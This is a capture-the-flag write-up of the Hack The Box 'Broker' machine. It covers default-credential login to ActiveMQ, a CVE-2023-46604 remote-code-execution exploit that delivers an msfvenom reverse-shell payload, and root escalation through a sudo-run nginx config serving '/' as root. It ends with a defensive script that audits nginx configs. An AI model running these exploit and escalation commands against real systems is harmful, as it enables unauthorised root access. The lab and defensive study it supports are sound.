Broker - HTB
Date : 21 Dec 2023 Thursday
Recon
Nmap
nmap --min-rate 1000 -p- -Pn 10.129.230.87 -oN nmap_tcp.txt
Output:
So we can see that several ports are open on the machine. Let's start with port 80.
Here we can see that ActiveMQ is running; let's check the version.
Visiting the /admin endpoint
Trying the default credentials:
Username: Admin
Password: Admin
It worked.
We can see that the ActiveMQ version is 5.15.15.
Shell as activemq
Upon searching for an exploit related to this version, I came across this repo:
CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ
By following the instructions we can easily get a shell:
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ.git
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server
Edit the file poc-linux.xml and the address used in poc-linux.xml.
go run main.go -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:$RPORT/poc-linux.xml
Privilege escalation
sudo -l
We can execute nginx with root privileges, so let's start a web server that gives us root-level access to the filesystem of the server it is running on. First, look at the existing configuration (comment lines filtered out):
cat /etc/nginx/nginx.conf | grep -v "^\s*#"
cat /etc/nginx/sites-enabled/default
Make a file on your system:
nano nginx.conf
user root;
worker_processes auto;
pid /run/nginx2.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
    worker_connections 768;
}
http {
    server {
        listen 1337;
        location / {
            root /;
        }
    }
}
Start a Python web server:
python -m http.server
Download it onto the target machine, into the /dev/shm directory:
wget http://$RHOST:8000/nginx.conf
Start the server:
sudo nginx -c /dev/shm/nginx.conf
Download the flag:
curl http://localhost:1337/root/root.txt
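As a defensive counterpart to the escalation above (an added example, not code from the writeup): a small audit of an nginx configuration that flags the two directives this technique depends on, `user root;` and `root /;`, so a sudo-launched rogue config like the one above stands out. Both sample configurations are constructed for illustration.

```python
"""Audit an nginx config for the directives abused in the writeup above.
Added example; the sample configs below are constructed, not taken from a host."""
import re

# Constructed sample: the rogue config dropped in /dev/shm in the writeup.
ROGUE_CONF = """
user root;
worker_processes auto;
pid /run/nginx2.pid;   # second instance beside the real service
events { worker_connections 768; }
http {
    server {
        listen 1337;
        location / {
            root /;
        }
    }
}
"""

# Constructed sample: a benign Debian-style default configuration.
SAFE_CONF = """
user www-data;
worker_processes auto;
pid /run/nginx.pid;
events { worker_connections 768; }
http {
    server {
        listen 80 default_server;
        root /var/www/html;
        location / { try_files $uri $uri/ =404; }
    }
}
"""

def strip_comments(conf: str) -> str:
    # Drop everything from '#' to end of line (nginx has no block comments).
    return "\n".join(re.sub(r"#.*$", "", line) for line in conf.splitlines())

def audit_nginx_conf(conf: str) -> list:
    """Return a list of findings; an empty list means nothing suspicious."""
    text = strip_comments(conf)
    findings = []
    # 'user root;' or 'user root <group>;' makes the workers run as uid 0.
    if re.search(r"^\s*user\s+root(\s+\S+)?\s*;", text, re.M):
        findings.append("user root: worker processes run as root, so every root-readable file is servable")
    # 'root /;' (or 'root //;') turns the whole filesystem into the web root.
    for m in re.finditer(r"^\s*root\s+(\S+?)\s*;", text, re.M):
        if m.group(1).strip("\"'").rstrip("/") == "":
            findings.append("root /: document root is the filesystem root")
    return findings
```

On a real host, run the audit over `/etc/nginx/nginx.conf` and over the `-c` argument of any running nginx master process (`ps -o args= -C nginx`), since the rogue config lives outside /etc/nginx.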